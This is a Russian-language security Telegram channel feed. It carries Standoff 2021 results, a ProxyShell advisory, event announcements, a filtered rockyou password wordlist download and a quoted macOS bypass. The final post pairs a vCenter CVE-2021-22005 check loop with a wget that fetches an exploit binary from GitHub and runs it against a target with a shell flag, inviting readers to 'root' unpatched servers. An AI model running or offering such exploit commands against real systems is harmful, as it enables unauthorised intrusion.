SecuriXy.kz
9.28K subscribers
483 photos
22 videos
18 files
393 links
Все самое интересное из мира информ. безопасности и IT 👍🏻
Обсуждаем, делимся, умнеем
https://securixy.kz

Обратная связь - @feedback_securixy_bot

Хахатушки - @memekatz
Hack the Box RUS - @HTB_RUS
Download Telegram
https://standoff365.com/cyber-range/
Очень интересный марафон The Standoff 2021, присоединяйтесь, болейте за нас, смотрите...
Forwarded from Positive Events
Forwarded from Positive Events
Подводим итоги The Standoff и объявляем победителей
 
За все время The Standoff было реализовано 33 уникальных бизнес-риска — 54% от общего числа рисков, заложенных в программу соревнований. Всего жюри приняло 84 отчета об успешно выполненных заданиях от команд атакующих. Победителями среди команд «красных» стали True0xA3 (35 877 баллов), Сodeby (30 183) и Invuls (17 643).

От хакерских атак пострадали все компании. Атаки затронули газораспределительную станцию, нефтекачалки, ТЭЦ, ветрогенераторы, электроподстанцию, железнодорожное хозяйство, аэропорт, морской порт, магазины, сеть рекламных видеоэкранов, систему уличного освещения, офисы компаний 25 Hours, Heavy Ship Logistics, Nuft, Tube. Чаще всего бизнес-риски реализовывали в компаниях Heavy Ship Logistics и FairMarket — 33 и 26 раз соответственно.
Расскажем о самых серьезных кибератаках, которые поставили бизнес города F под угрозу.

Компания Tube обслуживает сразу несколько объектов городской инфраструктуры. Первое направление ее работы — это доставка газа и электроэнергии. Из-за атак команды True0xA3 на систему управления произошли взрывы на газораспределительной станции. Инцидент унес жизни четырех сварщиков, а северо-запад города остался без газа. Генеральный директор Tube вынужден подать в отставку. Клиенты уже готовят иски против компании.

Хакеры обесточили и оживленную городскую магистраль, которую обслуживает компания Tube. В результате внезапно отключилось освещение, ситуацию усугубили дождь и туман, и многие водители не справились управлением. Итог — сразу несколько крупных ДТП.

В результате следующего нападения город остался без электричества. Атакующие отключили линии электропередач, взломав устройства релейной защиты и автоматики на подстанции, принадлежащей Tube. Но специалисты компании не сразу заметили проблему, поскольку хакеры подменили данные на диспетчерском пульте. Кибератака привела к блэкауту, погрузив город во тьму.

Случилось и еще одно неприятное событие: экраны компании Tube транслировали компромат на рекламодателей — подробности переговоров, конфиденциальные документы и скандальные фотографии. Клиенты подают в суд и уходят к конкурентам.

Всего в Tube было реализовано 8 из 9 бизнес-рисков. Семь из них — командой True0xA3.

Big Bro Group производит электроэнергию для нужд города. На этой неделе произошли неполадки в работе ветропарка и газотурбинной электростанции, которые принадлежат компании. Командам Invuls и Codeby удалось получить доступ к системе управления ветрогенераторами и вызвать полную их остановку. Хакеры замаскировали свои действия, подменив данные на пульте управления: диспетчеры были уверены, что генераторы работают штатно. Чтобы компенсировать потерю мощности, клиентов перевели на энергию от ТЭЦ. Однако хакеры взломали систему управления на электростанции и остановили газовую турбину. Город F снова остался без света. Госучреждения, детские сады и школы, розничные магазины вынуждены были закрыться еще в середине рабочего дня.

Следующая кибератака команды Codeby на электростанцию привела к активации автоматической системы пожаротушения. В результате была остановлена газовая турбина и прекращена поставка электроэнергии в город. Деловой центр, магазины и городские поликлиники вынуждены были остановить работу. Эта же команда взломала корпоративную ERP-систему и заменила расчетные счета нескольких поставщиков на подставные. Теперь компания будет отправлять платежи на счета хакеров, не подозревая об этом.

Nuft — крупная региональная корпорация по добыче и переработке нефтепродуктов — столкнулась с остановкой добычи нефти. Атакующие из Сodeby и True0xA3 остановили автоматизированную систему управления и подменили показатели приборов. Нефтедобыча компании сократилась за сутки на 90%. Простой вызвал панику на рынке, рост цен, ажиотажный спрос на нефтепродукты и одновременно резкое падение акций компании Nuft.
 
В инфраструктуре ретейлера FairMarket произошли 7 из 9 нежелательных для бизнеса событий.
Forwarded from Positive Events
Интернет-магазин компании был отключен от системы безналичной оплаты в результате взлома, и клиенты лишились возможности делать покупки. Кроме того, хакеры взломали ERP-систему и подменили цены на топовые модели смартфонов, что привело к крупным финансовым потерям и закрытию магазинов. Ретейлер столкнулся и с незаконной продажей алкоголя в ночное время из-за действий хакеров, теперь компании грозят штрафы.

Транспортная компания Heavy Ship Logistics стала основной целью атакующих. В морском порту контейнер упал прямо на баржу. Как выяснилось, хакеры Invuls перехватили управление портальным краном и подавали заведомо неправильные команды. Компании придется покрыть стоимость испорченного груза, и не одна неделя уйдет на ремонт судна.

На вокзале города F был полный хаос. Команды Invuls и Unlim подменили расписание поездов на всех электронных табло. Часть поездов задерживались, люди сдавали билеты и пересаживались на автобусы. А еще хакеры взломали IT-систему, отвечающую за регистрацию пассажиров в аэропорту; несколько рейсов были отменены. Тем временем атакующие получили доступ к системам продажи билетов на самолет и поезд: теперь все желающие могут приобрести билеты бесплатно!

Атакующие прислали 343 отчета об уязвимостях выявленных в инфраструктурах компаний. Самым популярным вектором проникновения в локальные сети становились незащищенные веб-приложения. В системах Big Bro Group уязвимости искали активнее всего: 37% отчетов относились к ресурсам этой компании. А вот в компании 25 Hours нашли уязвимости только 15 раз.

Команды защитников прислали 328 отчетов о выявленных инцидентах. Среди источников событий чаще всего они указывали средства анализа сетевого трафика, а команды, под защитой которых находились офисы Nuft и Tube, фиксировали инциденты еще и с помощью системы анализа технологического трафика. В первые дни, когда атакующие только получали первоначальные доступы в сети компаний, в топ-3 источников событий входили и межсетевые экраны уровня приложений. По количеству отчетов об атаках в тройке лидеров команды Jet Security Team (компания Tube), akPots_team (Nuft) и Yourshellnotpass (25 Hours). За время соревнований защитники успели расследовать 18 реализованных бизнес-рисков, причем команды Jet Security Team и Yourshellnotpass расследовали все осуществленные в их компаниях риски. В среднем на расследование с необходимой полнотой собранных фактов требовалось около 5 часов.
✌️
rockyou2021_min_length_8.7z
1.8 GB
rockyou 2021 - отфильтрованный на пароли =>8 символов и [a-zA-Z0-9]
Из 92 Gb - получилось 19Gb
#wordlist #rockyou #rockyou2021 #parsed_rockyou #rockyou2021_printable_8_40 #passwords
Приветствую вас друзья, хотим анонсировать вам следующих наших гостей, да да, именно гостей👌
Первый наш гость: @SooLFaa
Администратора форума Codeby.net и по совместительству руководитель направления application security в Тинькофф
Второй наш гость представительница прекрасного пола @olzlg
IT-recruiter специалистов по информационной безопасности в Тинькофф банк.
Третий гость : Много уважаемый вице капитан команды форума Codeby. @clevergod
В планах стрима :
Познакомимся поближе с ребятами из команды Тинькофф.
Узнаем насколько интересна работа в it банке, чем они занимаются
Ребята расскажут вам как проводиться собеседование и как они отбирают кандидатов в свою команды
Бонус: Стримеру проведут собеседование прямо в прямом эфире 🥳

Стрим будет проходить 10 июля в 18:00 по московскому времени на следующих платформах:
✔️ https://www.twitch.tv/thecodeby
✔️ https://www.youtube.com/channel/UCKgJTuOCdxO7c9A3-ZVxTSA
✔️ https://vk.com/codeby_net
✔️ https://www.facebook.com/codeby.net/
✔️ https://cyberhero.tele2.ru/stream/user225626
✔️ https://ok.ru/group/56709935661181
Атака на Microsoft Exchange с помощью ProxyShell

Новая группа вымогателей, именуемая как LockFile, занимается взломом серверов Microsoft Exchange и шифрованием доменов Windows с использованием недавно обнаруженных уязвимостей ProxyShell.

ProxyShell - это атака на Microsoft Exchange с помощью трёх (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), связанных между собой, уязвимостей. Она позволяет удалённо выполнять код без аутентификации. Microsoft устранила эти уязвимости ещё в мае 2021 года, 5 августа 2021 года на конференции Black Hat USA 2021 был представлен доклад о новых плоскостях атаки на MS Exchange с использованием уязвимостей (CVE-2021-31195, CVE-2021-31196, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
Цепочка уязвимостей позволяет неаутентифицированному атакующему выполнить произвольный код с наивысшими привилегиями на уязвимом сервере и были раскрыты дополнительные технические детали, которые дали эксплойту вторую жизнь.

Всему Казнету, коллегам из России крайне советуем поставить заплатки.
Удаленное выполнение кода на сервере MS Exchange
CVE-ID: CVE-2021-31195
VENDOR-ADVISORY: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31195
CVSS: 3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CVSS Score: 8.8 (High)
Удаленное выполнение кода на сервере MS Exchange
CVE-ID: CVE-2021-31196
VENDOR-ADVISORY: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31196
CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 7.2 (High)
Удаленное выполнение кода на сервере MS Exchange
CVE-ID: CVE-2021-34473
VENDOR-ADVISORY: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
CVSS: 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8 (Critical)
Повышение привилегий на сервере MS Exchange
CVE-ID: CVE-2021-34523
VENDOR-ADVISORY: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523
CVSS: 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8 (Critical)
Уязвимость обхода функции безопасности MS Exchange
CVE-ID: CVE-2021-31207
VENDOR-ADVISORY: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31207
CVSS: 3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 7.2 (High)

Уязвимые программные продукты:
Microsoft Exchange Server 2013
Microsoft Exchange Server 2016
Microsoft Exchange Server 2019
Более того, любой неавторизованный пользователь может извлечь все почтовые ящики, ФИО, информацию о домене и должностях с контактами, ну и конечно же исполнить RCE
Не в тему ИБ, но сделали оч. круто, Яндекс творит...
Нейросети Яндекса научились сами переводить и озвучивать видео на английском языке. Пока — не везде, но уже скоро любой ролик на английском можно будет смотреть на русском.
https://browser.yandex.ru/welcome-update/r/video-translation/

Проверил и действительно говорит на чистом русском.
Forwarded from KazHackStan HUB
Пока бар работает еще в техническом формате, но мы уже запускаем новый сезон технических ивентов у нас!

В этот вторник в KHS HUB у нас два доклада:

1) OSINT: Разведка по открытым источникам. Кейс из BugBounty по критически важной инфраструктуре. (Виталий zig Перов)

2) ®clevergod® выступит с темой «CTF» - что дают CTF площадки для собственного саморазвития, стоит ли их расценивать как платформы для обучения и нужно ли оно Вам.

📂 clevergod имеет 18 летний опыт работы в IT и ИБ, активный участник CTF площадок, таких как HTB, HTM, PriviaHub etc, вице-капитан команды Codeby победившей на The Standoff 2020, 2 место на The Standoff 2021.



Если у вас есть тема доклада по Cybersecurity, разработке или вообще про IT, с которой вы бы хотели выступить у нас, смело пишите =)

Следите за новостями на @khs.hub
🕐 21 сентября 2021, 20:00
📍KHS HUB, пр. Улы Дала, 5/2
https://www.instagram.com/khs.hub/
Unpatched High-Severity Vulnerability Affects Apple macOS Computers
Affected Versions: macOS Big Sur and prior

https://thehackernews.com/2021/09/unpatched-high-severity-vulnerability.html

"Newer versions of macOS (from Big Sur) have blocked the 'file://' prefix (in the com.apple.generic-internet-location) however they did a case matching causing 'File://' or 'fIle://' to bypass the check," the advisory said. "We have notified Apple that 'FiLe://' (just mangling the value) doesn't appear to be blocked, but have not received any response from them since the report has been made. As far as we know, at the moment, the vulnerability has not been patched."
Надеюсь все обновились от #VMWare vCenter Server File Upload to #RCE #CVE-2021-22005

как проверить:
cat vmware_centers.txt | while read S do; do curl --connect-timeout 15 --max-time 30 --silent --insecure --user-agent "vAPI/2.100.0 Java/1.8.0_261 (Linux; 4.19.160-6.ph3; amd64)" -X POST "https://$S/analytics/telemetry/ph/api/hyper/send?_c&_i=test" -d "lorem ipsum" -H "Content-Type: application/json" -L --stderr - -v | tac | grep -q "HTTP/1.1 201" && printf "$S \033[1;35mVulnerable\e[0m\n" || printf "$S \033[1;32mPatched\e[0m\n"; done;

Если Ваши админы еще не вразумили - рутуйтесь:
wget https://github.com/r0ckysec/CVE-2021-22005/raw/main/exp/cve-2021-22005_exp_linux; chmod +x
cve-2021-22005_exp_linux;

./cve-2021-22005_exp_linux -u https://IP --shell